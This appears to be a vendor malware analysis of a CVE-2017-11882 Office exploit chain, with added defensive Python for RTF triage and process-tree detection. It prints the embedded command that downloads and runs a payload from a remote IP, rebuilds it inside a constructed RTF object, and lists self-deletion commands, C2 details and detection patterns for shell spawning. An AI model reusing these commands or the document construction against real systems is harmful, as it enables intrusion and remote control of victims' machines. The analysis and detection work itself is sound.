Threat Analysis: Equation Equals Backdoor

Ryan Murphy, www.carbonblack.com
2017-11-22 18:50:11
CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD
CVSS3: 7.8 High (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)

  • Attack Vector: LOCAL
  • Attack Complexity: LOW
  • Privileges Required: NONE
  • User Interaction: REQUIRED
  • Scope: UNCHANGED
  • Confidentiality Impact: HIGH
  • Integrity Impact: HIGH
  • Availability Impact: HIGH

CVSS2: 9.3 High (AV:N/AC:M/Au:N/C:C/I:C/A:C)

  • Access Vector: NETWORK
  • Access Complexity: MEDIUM
  • Authentication: NONE
  • Confidentiality Impact: COMPLETE
  • Integrity Impact: COMPLETE
  • Availability Impact: COMPLETE

EPSS: 0.974 High (Percentile 99.9%)

On November 20, 2017 an exploit for CVE-2017-11882 was publicly released, allowing code execution through vulnerable versions of Microsoft's Equation Editor.

CVE-2017-11882 affects the following versions of Microsoft Office:

  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2
  • Microsoft Office 2013 Service Pack 1
  • Microsoft Office 2016

Microsoft Equation Editor, which is a Microsoft Office component, contains a stack buffer overflow that allows remote code execution on a vulnerable system. Microsoft Equation Editor is an out-of-process COM server that is hosted by eqnedt32.exe.

DEP and ASLR should protect against such attacks; however, because of the manner in which eqnedt32.exe was linked, it does not use either feature, so code execution remains possible. Being an out-of-process COM server, protections specific to Microsoft Office such as EMET and Windows Defender Exploit Guard do not apply to eqnedt32.exe unless they are applied system-wide. This gives the attacker an avenue to lure targets into opening a specially crafted document, resulting in the ability to execute an embedded attacker command.

> In the sample analyzed, a Cobalt Strike payload was ultimately dropped on the compromised system. However, as exploitation of this CVE continues to gain traction, practitioners can expect other families to be used.
>
> The Carbon Black Threat Analysis Unit (TAU) expects this vulnerability to be actively exploited in both spam and spearphishing campaigns, over the next quarter.
>
> The graphic below highlights the overall process, which is detailed in the technical analysis section.

Figure 1: Process Overview

Technical analysis of a sample utilizing CVE-2017-11882 is detailed below. The Carbon Black TAU created a separate document for customers which details how they can use Carbon Black products to protect themselves against this type of attack.

Technical Analysis

Malicious Document - Stage One

| Field | Value |
|---|---|
| File Name | Изменения правил осуществления переводов.rtf |
| File Name 1 | account details.rtf |
| File Name 2 | news.swift.rtf |
| File Size | 31,811 |
| CRC32 | c326285e |
| MD5 | f360d41a0b42b129f7f0c29f98381416 |
| SHA1 | 245b867e578e9df12877df07017338863a5fdc59 |
| SHA256 | 17f9db18327a29777b01d741f7631d9eb9c7e4cb33aa0905670154a5c191195c |

Table 1: Sample metadata

The initial document contains a malicious equation that exploits the CVE-2017-11882 vulnerability. The exploit allows a crafted document to execute a command (with a maximum length of 44 bytes) via a call to the WinExec API. This exploit was released and documented in this post. The embedded command, shown in the table below, calls cmd.exe to download and execute a payload from a remote system.

```text
Offset    0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F
00000940 0A 0A 01 08 5A 5A 63 6D 64 20 2F 63 20           ZZcmd /c
00000950 73 74 61 72 74 20 5C 5C 31 33 38 2E 36 38 2E 32  start \\138.68.2
00000960 33 34 2E 31 32 38 5C 77 5C 77 2E 65 78 65 20 26  34.128\w\w.exe &
00000970 41 41 41 41 41 12 0C 43                          AAAAA C
```

Table 2: Embedded command

It should be noted that the payload in this document matches the object_data template and object_trailer of a public Proof of Concept for CVE-2017-11882, the only difference being the command itself.
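The following triage helper is an added example (not Carbon Black's tooling and not code from the analysis) showing how a defender can surface the embedded command without opening the document: it decodes every `\objdata` hex group in an RTF, anchors on the bytes that precede the font name in the Table 2 dump (0A 0A 01 08 followed by the two attribute bytes 5A 5A, an anchoring choice made here), and reports the printable "font name" that Equation Editor would copy into its fixed-size stack buffer. The OLE1 wrapper, the benign sample and the 31-character threshold are assumptions of this example; the malicious sample reproduces the bytes shown in Table 2, and the test confirms the extracted string is exactly 44 bytes long, matching the maximum command length stated above.

```python
"""Triage helper for RTF files carrying an Equation Editor object of the kind
used against CVE-2017-11882. Hypothetical example code, not Carbon Black's
tooling: it pulls every \\objdata hex group out of the RTF, locates the MTEF
FONT record that Equation Editor copies into a fixed-size stack buffer, and
reports the "font name" it carries. A benign equation carries a typeface
name; the analysed sample carries a 44-byte shell command."""
import re
import string

# Bytes preceding the font name in the Table 2 dump (0A 0A 01 08, then the
# two attribute bytes 5A 5A). Using them as an anchor is this example's choice.
FONT_RECORD_MARKER = b"\x0a\x0a\x01\x08"
FONT_ATTR_BYTES = 2
# Heuristic threshold chosen for this example; real typeface names are short.
MAX_SANE_FONT_NAME = 31
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")
SHELL_CHARS = set(b"\\/&|<>%")
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")


def extract_objdata_blobs(rtf: bytes) -> list:
    """Decode the hex payload of every \\objdata group in the RTF."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf):
        hexstr = re.sub(rb"\s+", b"", m.group(1))
        if len(hexstr) % 2:
            hexstr = hexstr[:-1]  # tolerate a truncated trailing nibble
        blobs.append(bytes.fromhex(hexstr.decode("ascii")))
    return blobs


def extract_font_name(blob: bytes):
    """Return the printable run following the first FONT record, or None."""
    idx = blob.find(FONT_RECORD_MARKER)
    if idx < 0:
        return None
    start = idx + len(FONT_RECORD_MARKER) + FONT_ATTR_BYTES
    end = start
    while end < len(blob) and blob[end] in PRINTABLE:
        end += 1
    return blob[start:end].decode("ascii")


def assess(rtf: bytes) -> dict:
    """Report the first font name found and whether it looks like a command."""
    for blob in extract_objdata_blobs(rtf):
        name = extract_font_name(blob)
        if name is None:
            continue
        overlong = len(name) > MAX_SANE_FONT_NAME
        shell_like = bool(SHELL_CHARS & set(name.encode()))
        return {"font_name": name, "length": len(name),
                "suspicious": overlong or shell_like}
    return {"font_name": None, "length": 0, "suspicious": False}


def _rtf_with_font_name(name: bytes, trailer: bytes) -> bytes:
    """Build a minimal RTF around an OLE1 Equation.3 object (constructed)."""
    ole1_header = b"\x01\x05\x00\x00\x02\x00\x00\x00\x0b\x00\x00\x00Equation.3\x00"
    native = FONT_RECORD_MARKER + b"\x5a\x5a" + name + trailer
    hexdata = (ole1_header + native).hex().encode("ascii")
    return b"{\\rtf1{\\object\\objemb{\\*\\objdata " + hexdata + b"}}}"


# Constructed reproduction of the Table 2 bytes: the command, five bytes of
# 'A' padding (44 bytes in total) and the three trailing bytes 12 0C 43.
MALICIOUS_RTF = _rtf_with_font_name(
    b"cmd /c start \\\\138.68.234.128\\w\\w.exe &" + b"AAAAA", b"\x12\x0c\x43")
# Constructed benign object: an ordinary typeface name.
BENIGN_RTF = _rtf_with_font_name(b"Times New Roman", b"\x00")

if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_RTF), ("benign", BENIGN_RTF)):
        print(label, assess(doc))
```

Production RTF from Word wraps the native stream in an OLE compound file rather than the bare bytes constructed here, so a byte search for the marker is deliberately used instead of a structured OLE parse; the same scan works on that layout because the Equation Native stream is stored uncompressed.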

Dropper - Stage Two

Stage two of the attack chain is a dropper that carries the final payload as a resource. The dropper is wrapped in a custom packer and then wrapped again in UPX. Once through the packers, the dropper prepares the third stage of the chain by locating it in the binary's resource section as C132.

Figure 2: Load Resource

Next, the dropper searches for wmplayer.exe in the expected 32 and 64-bit locations.

Figure 3: wmplayer.exe search

wmplayer.exe is created as a suspended process, the stage three DLL is injected into it and instructed to run. Finally, the dropper executes a command to delete the stage two dropper and exits.

```text
cmd.exe /C Del <path_to_original_dropper>
```

Table 3: Clean-up command
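The chain from the embedded command through the dropper, the wmplayer.exe injection host and the self-deletion leaves a distinctive process tree. The rules below are an added example (not a Carbon Black product query) that evaluates four such relationships over a constructed set of process-creation events; the field names, PIDs, and the expected-parent list for wmplayer.exe are assumptions of this example, while the IP, the `w.exe` name, and the `Del` command come from the analysis. The dropper is assumed to run from the UNC path the embedded command named, so the deleted path is that path.

```python
"""Process-tree detections for the dropper/injection chain described above.
Hypothetical example code, not a Carbon Black query; the event records are
constructed to resemble the chain, with field names of my own choosing."""
import ntpath
import re

SHELLS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Parents from which Windows Media Player is ordinarily started: an
# assumption for this example, to be tuned per environment.
EXPECTED_WMPLAYER_PARENTS = {"explorer.exe", "services.exe", "svchost.exe"}
# "start \\<ip>\..." : a program launched from a UNC path rooted at a bare IP.
UNC_IP_START = re.compile(r"\bstart\s+\\\\\d{1,3}(?:\.\d{1,3}){3}\\")


def base(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def rule_eqnedt_spawns_shell(ev) -> bool:
    """Equation Editor, an out-of-process COM server, never needs a shell."""
    return base(ev["parent_image"]) == "eqnedt32.exe" and base(ev["image"]) in SHELLS


def rule_cmd_start_from_unc_ip(ev) -> bool:
    """cmd.exe starting a program straight from an IP-addressed UNC share."""
    return base(ev["image"]) == "cmd.exe" and UNC_IP_START.search(ev["cmdline"].lower()) is not None


def rule_wmplayer_unusual_parent(ev) -> bool:
    """wmplayer.exe created by something other than its usual launchers."""
    return base(ev["image"]) == "wmplayer.exe" and base(ev["parent_image"]) not in EXPECTED_WMPLAYER_PARENTS


def rule_parent_self_delete(ev) -> bool:
    """cmd.exe asked to delete the very file its parent process runs from."""
    cl = ev["cmdline"].lower()
    return base(ev["image"]) == "cmd.exe" and " del " in cl and ev["parent_image"].lower() in cl


RULES = {
    "equation_editor_spawns_shell": rule_eqnedt_spawns_shell,
    "cmd_start_from_unc_ip": rule_cmd_start_from_unc_ip,
    "wmplayer_unusual_parent": rule_wmplayer_unusual_parent,
    "dropper_self_delete": rule_parent_self_delete,
}


def evaluate(events) -> list:
    """Return (pid, rule name) for every rule that fires on every event."""
    return [(ev["pid"], name) for ev in events for name, rule in RULES.items() if rule(ev)]


# Constructed sample events. Paths are illustrative; the parent of
# EQNEDT32.EXE is the DCOM launcher (svchost.exe), not Word, because the
# Equation Editor is hosted out of process.
EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
SVCHOST = r"C:\Windows\System32\svchost.exe"
CMD = r"C:\Windows\System32\cmd.exe"
DROPPER = r"\\138.68.234.128\w\w.exe"  # payload path from Table 2
WMPLAYER = r"C:\Program Files\Windows Media Player\wmplayer.exe"

EVENTS = [
    {"pid": 2000, "image": EQNEDT, "parent_image": SVCHOST, "cmdline": f'"{EQNEDT}" -Embedding'},
    {"pid": 2001, "image": CMD, "parent_image": EQNEDT, "cmdline": r"cmd /c start \\138.68.234.128\w\w.exe &"},
    {"pid": 2002, "image": DROPPER, "parent_image": CMD, "cmdline": DROPPER},
    {"pid": 2003, "image": WMPLAYER, "parent_image": DROPPER, "cmdline": f'"{WMPLAYER}"'},
    {"pid": 2004, "image": CMD, "parent_image": DROPPER, "cmdline": f"cmd.exe /C Del {DROPPER}"},
    # Benign: the user opens Media Player from the shell.
    {"pid": 3000, "image": WMPLAYER, "parent_image": r"C:\Windows\explorer.exe", "cmdline": f'"{WMPLAYER}"'},
]

if __name__ == "__main__":
    for pid, rule in evaluate(EVENTS):
        print(f"pid {pid}: {rule}")
```

The first rule keys on eqnedt32.exe as the parent of the shell rather than on WINWORD.EXE, because the out-of-process COM hosting described earlier means Word is never the direct parent of the command; the wmplayer.exe rule catches the suspended-process injection host by its odd parent alone, which is the only part of that step visible in a plain process-creation event.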

Backdoor - Stage Three

The final stage is a Cobalt Strike backdoor that connects back to the C&C server at:

  • https://104.144.207.207
    • /j.ad
    • /submit.php
  • User-Agent
    • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)

This final payload gives the attacker full control over the system. The backdoor is capable of executing arbitrary commands from the C2 server as well as injecting additional payloads into memory using the ReflectiveLoader export of the DLL.

Conclusion

Spam campaigns do their best to take advantage of the latest and most modular types of attacks, using the most recent vulnerabilities in order to maximize their effectiveness against the largest number of targets. The Carbon Black TAU constantly monitors the threat landscape in order to provide the community and our customers with the latest trends and IOCs to increase security across the board.

To decrease the likelihood of infection, everyone should ensure that the latest security updates are installed, and users should not open suspicious documents that they are not expecting.

Indicators

| Indicator | Type | Context |
|---|---|---|
| 138.68.234.128 | IP | Payload Delivery Server |
| 104.144.207.207 | IP | Command and Control Server |
| d46df9eacfe7ff75e098942e541d0f18 | MD5 | Payload (w.exe) |
| 60656140e2047bd5aef9b0568ea4a2f7c8661a524323111099e49048b27b72c7 | SHA256 | Payload (w.exe) |
| 86d739651881c01cfe5ce6867df3025a | MD5 | Cobalt Strike (final) Backdoor |
| 5f777cbad221cb2d89c59ff84ced2fd278d6d220c3cfc13e3fb8e2ca38698e0f | SHA256 | Cobalt Strike (final) Backdoor |
